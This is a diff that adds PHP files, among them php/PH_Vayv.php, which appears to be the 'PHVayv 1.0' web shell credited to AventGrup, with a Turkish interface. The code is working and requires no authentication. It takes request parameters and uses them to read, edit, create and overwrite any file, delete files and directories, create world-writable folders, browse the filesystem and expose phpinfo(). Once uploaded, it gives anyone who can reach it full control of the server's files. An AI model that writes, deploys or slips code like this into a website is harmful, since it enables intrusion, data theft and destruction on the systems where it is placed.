+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>

php/PH_Vayv.php

@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
